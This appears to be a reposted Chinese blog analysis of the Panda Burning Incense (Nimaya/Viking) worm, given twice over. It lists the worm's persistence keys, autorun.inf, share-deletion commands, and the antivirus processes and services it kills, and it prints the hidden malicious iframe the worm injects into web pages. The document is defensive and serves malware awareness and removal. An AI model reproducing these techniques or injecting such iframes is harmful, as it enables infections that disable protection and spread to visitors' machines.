安全配置2k服务器全攻略
一键清理系统垃圾文件
1月15
熊猫烧香:警惕程度★★★☆,蠕虫病毒,通过感染文件传播,依赖系统:WIN 9X/NT/2000/XP。
该病毒采用熊猫头像作为图标,诱使用户运行。
病毒运行后,感染系统中exe,com,pif,scr,html,asp等文件
注意 此病毒删除 GHO 文件 做GHOST备份的 注意改下扩展名 以防万一
瑞星 :Worm.Nimaya (熊猫烧香)专杀地址:http://download.rising.com.cn/zsgj/NimayaKiller.scr
金山 : 武汉男孩 (熊猫烧香)专杀地址:www.kingsoft.com/db/download/othertools/DuBaTool_W..." target="_blank">http://down.www.kingsoft.com/db/download/othertools/DuBaTool_W...
江民 : VIKING (熊猫烧香)专杀地址:http://download.jiangmin.info/jmsoft/VikingKiller.exe
运行样本..
释放文件
C:\WINDOWS\system32\drivers\spo0lsv.exe
创建启动项
[software\microsoft\windows\currentversion\run]
"svcshare"="C:\WINDOWS\system32\drivers\spo0lsv.exe"
修改 显示文件和文件夹 注册表
[software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000
所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
使用命令关闭共享
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
尝试关闭窗口
防火墙
进程
杀毒
virusscan
nod32
网镖
毒霸
瑞星
江民
超级兔子
优化大师
木马清道夫
卡巴斯基反病毒
symantec antivirus
duba
esteem procs
绿鹰pc
密码防盗
噬菌体
木马辅助查找器
system safety monitor
wrapped gift killer
winsock expert
游戏木马检测大师
超级巡警
pjf(ustc)
icesword
msctls_statusbar32
尝试关闭进程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe
删除以下启动项
software\microsoft\windows\currentversion\run\ravtask
software\microsoft\windows\currentversion\run\kvmonxp
software\microsoft\windows\currentversion\run\kav
software\microsoft\windows\currentversion\run\kavpersonal50
software\microsoft\windows\currentversion\run\mcafeeupdaterui
software\microsoft\windows\currentversion\run\network associates error reporting service
software\microsoft\windows\currentversion\run\shstatexe
software\microsoft\windows\currentversion\run\ylive.exe
software\microsoft\windows\currentversion\run\yassistse
禁用以下服务
schedule
sharedaccess
rsccenter
rsravmon
kvwsc
kvsrvxp
kavsvc
avp
kavsvc
mcafeeframework
mcshield
mctaskmanager
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc
搜索感染除以下目录外的所有.exe/.scr/.pif/.com/.htm/.html/.asp/.php/.jsp/.aspx文件
windows
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone
感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除gho文件..
感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:30,001 字节(病毒主体) 尾部添加:29 字节(标记信息)
感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
在访问过的目录下生成 desktop_.ini 文件..
用弱口令访问区域内的计算机(gamesetup.exe)...口令就不列了..
来源:夕阳醉了's Blog
地址:http://www.oznn.com/post/10/
转载时须以链接形式注明作者和原始出处及本声明!
该病毒采用熊猫头像作为图标,诱使用户运行。
病毒运行后,感染系统中exe,com,pif,scr,html,asp等文件
注意 此病毒删除 GHO 文件 做GHOST备份的 注意改下扩展名 以防万一
瑞星 :Worm.Nimaya (熊猫烧香)专杀地址:http://download.rising.com.cn/zsgj/NimayaKiller.scr
金山 : 武汉男孩 (熊猫烧香)专杀地址:www.kingsoft.com/db/download/othertools/DuBaTool_W..." target="_blank">http://down.www.kingsoft.com/db/download/othertools/DuBaTool_W...
江民 : VIKING (熊猫烧香)专杀地址:http://download.jiangmin.info/jmsoft/VikingKiller.exe
运行样本..
释放文件
C:\WINDOWS\system32\drivers\spo0lsv.exe
创建启动项
[software\microsoft\windows\currentversion\run]
"svcshare"="C:\WINDOWS\system32\drivers\spo0lsv.exe"
修改 显示文件和文件夹 注册表
[software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000
所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
使用命令关闭共享
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
尝试关闭窗口
防火墙
进程
杀毒
virusscan
nod32
网镖
毒霸
瑞星
江民
超级兔子
优化大师
木马清道夫
卡巴斯基反病毒
symantec antivirus
duba
esteem procs
绿鹰pc
密码防盗
噬菌体
木马辅助查找器
system safety monitor
wrapped gift killer
winsock expert
游戏木马检测大师
超级巡警
pjf(ustc)
icesword
msctls_statusbar32
尝试关闭进程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe
删除以下启动项
software\microsoft\windows\currentversion\run\ravtask
software\microsoft\windows\currentversion\run\kvmonxp
software\microsoft\windows\currentversion\run\kav
software\microsoft\windows\currentversion\run\kavpersonal50
software\microsoft\windows\currentversion\run\mcafeeupdaterui
software\microsoft\windows\currentversion\run\network associates error reporting service
software\microsoft\windows\currentversion\run\shstatexe
software\microsoft\windows\currentversion\run\ylive.exe
software\microsoft\windows\currentversion\run\yassistse
禁用以下服务
schedule
sharedaccess
rsccenter
rsravmon
kvwsc
kvsrvxp
kavsvc
avp
kavsvc
mcafeeframework
mcshield
mctaskmanager
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc
搜索感染除以下目录外的所有.exe/.scr/.pif/.com/.htm/.html/.asp/.php/.jsp/.aspx文件
windows
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone
感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除gho文件..
感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:30,001 字节(病毒主体) 尾部添加:29 字节(标记信息)
感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>
在访问过的目录下生成 desktop_.ini 文件..
用弱口令访问区域内的计算机(gamesetup.exe)...口令就不列了..
来源:夕阳醉了's Blog
地址:http://www.oznn.com/post/10/
转载时须以链接形式注明作者和原始出处及本声明!
-------
http://www.tiaowuba.com/blog/
伪医生律师的博客